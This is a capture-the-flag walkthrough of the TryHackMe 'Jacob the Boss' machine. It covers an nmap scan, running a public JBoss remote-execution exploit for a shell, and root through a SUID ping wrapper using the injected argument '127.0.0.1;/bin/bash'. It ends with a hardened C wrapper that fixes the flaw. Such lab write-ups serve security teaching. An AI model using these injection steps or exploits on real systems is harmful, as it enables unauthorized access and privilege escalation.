Hello, in this post I will walk through the solution of the machine named "Jacob the Box" on the TryHackMe platform. Enjoy the read…
Solution
1 — First I add the machine's hostname to /etc/hosts.
[root:/home/alper/Desktop/TRYHACKME]# echo "10.10.60.225 jacobtheboss.box" | tee -a /etc/hosts
10.10.60.225 jacobtheboss.box
2 — Using Nmap, I gather detailed information about the open ports and the services running on the machine.
[root:/home/alper/Desktop/TRYHACKME]# nmap -sS -sV 10.10.60.225
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-07 22:33 +03
Nmap scan report for jacobtheboss.box (10.10.60.225)
Host is up (0.068s latency).
Not shown: 987 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/7.3.20)
111/tcp open rpcbind 2-4 (RPC #100000)
1090/tcp open java-rmi Java RMI
1098/tcp open java-rmi Java RMI
1099/tcp open java-object Java Object Serialization
3306/tcp open mysql MariaDB (unauthorized)
4444/tcp open java-rmi Java RMI
4445/tcp open java-object Java Object Serialization
4446/tcp open java-object Java Object Serialization
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
8083/tcp open http JBoss service httpd
3 — I see a JBoss service running on port 8080. I search searchsploit for "jboss" to find a suitable exploit.
[root:/home/alper/Desktop/TRYHACKME]# searchsploit "jboss"
------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------ ---------------------------------
Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalle | php/remote/28713.php
Cisco DCNM JBoss 10.4 - Credential Leakage | java/remote/47885.txt
Cisco Security Monitoring Analysis and Response System JBoss - Command Execution | hardware/remote/28245.pl
Cisco/Protego CS-MARS < 4.2.1 - 'JBoss' Remote Code Execution | hardware/remote/2048.pl
JBoss & JMX Console - Misconfigured Deployment Scanner | jsp/webapps/17924.pl
JBoss - DeploymentFileRepository WAR Deployment (via JMXInvokerServlet) (Metasploit | multiple/remote/21080.rb
JBoss - Java Class DeploymentFileRepository WAR Deployment (Metasploit) | multiple/remote/16316.rb
JBoss 3.0.8/3.2.1 - HSQLDB Remote Command Injection | multiple/remote/23221.txt
JBoss 3.x/4.0.2 - HTTP Request Remote Information Disclosure | multiple/remote/25842.txt
JBoss Application Server 4.2 < 4.2.0.CP09 / 4.3 < 4.3.0.CP08 - Remote Command Execu | jsp/webapps/16274.pl
JBoss AS 2.0 - Remote Command Execution | windows/remote/17977.txt
JBoss AS 3/4/5/6 - Remote Command Execution | multiple/webapps/36575.py
JBoss JMX - Console Beanshell Deployer WAR Upload and Deployment (Metasploit) | multiple/remote/16319.rb
JBoss JMX - Console Deployer Upload and Execute (Metasploit) | multiple/remote/16318.rb
JBoss JMXInvokerServlet JMXInvoker 0.3 - Remote Command Execution | java/webapps/36553.java
JBoss Remoting 6.14.18 - Denial of Service | multiple/dos/44099.txt
JBoss Seam 2 - Arbitrary File Upload / Execution (Metasploit) | jsp/remote/36653.rb
Red Hat JBoss EAP - Deserialization of Untrusted Data | java/webapps/40842.txt
Websphere/JBoss/OpenNMS/Symantec Endpoint Protection Manager - Java Deserialization | multiple/remote/44552.sh
[root:/home/alper/Desktop/TRYHACKME]# searchsploit -m 36575
4 — After running the exploit I get a shell. I find the first flag in the jacob user's home directory.
[root:/home/alper/Desktop/TRYHACKME]# python2.7 36575.py jacobtheboss.box:8080
*
*
[Type commands or "exit" to finish]
Shell> cat /home/jacob/user.txt
**CENSORED**
5 — I look for commands that can be run with sudo privileges and for binaries with the SUID bit set. A command named "/usr/bin/pingsys" catches my attention.
Shell> find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/bin/pingsys
*
*
6 — This command does the same thing as "ping". To abuse it, I pass a parameter of the form "127.0.0.1;/bin/bash", which switches me to the root user. Under the root directory I also obtain the second flag.
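The root cause in step 6 is a privileged wrapper that hands its argument to a shell, so a ";" in the host string becomes a second command. The following is an added example, not the write-up's code and not the actual pingsys binary: a hypothetical hardened wrapper that allowlists the target characters and calls ping through execv(), so the argument is never parsed by /bin/sh. The ping path and the "-c 4" option are assumptions.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Accept only characters that can appear in an IPv4 address or a hostname.
 * Shell metacharacters (';', '|', '&', '$', spaces, ...) are rejected outright.
 * Returns 1 if the target is acceptable, 0 otherwise. */
int is_safe_target(const char *host)
{
    if (host == NULL) return 0;
    size_t len = strlen(host);
    if (len == 0 || len > 253) return 0;   /* DNS name length bound (RFC 1035) */
    if (host[0] == '-') return 0;          /* must not turn into a ping option */
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)host[i];
        if (!(isalnum(c) || c == '.' || c == '-')) return 0;
    }
    return 1;
}

/* Build ping's argument vector directly: no shell, no word splitting.
 * argv is the caller's buffer of at least 5 entries. Returns the number of
 * entries written (excluding the terminating NULL), or -1 on error. */
int build_ping_argv(const char *host, const char *argv[], size_t argv_len)
{
    if (argv_len < 5 || !is_safe_target(host)) return -1;
    argv[0] = "/usr/bin/ping";   /* assumed path */
    argv[1] = "-c";
    argv[2] = "4";
    argv[3] = host;              /* passed as one literal argv entry */
    argv[4] = NULL;
    return 4;
}

int main(int argc, char **argv)
{
    const char *ping_argv[5];
    if (argc != 2 || build_ping_argv(argv[1], ping_argv, 5) < 0) {
        fprintf(stderr, "usage: %s <ipv4-or-hostname>\n", argv[0]);
        return 1;
    }
    /* execv() replaces this process with ping; the host is never seen by a shell. */
    execv(ping_argv[0], (char *const *)ping_argv);
    perror("execv");
    return 1;
}
```

With this wrapper, the input from step 6 is refused at validation time instead of being executed, which is the behaviour a defender should expect from any SUID helper that takes user input.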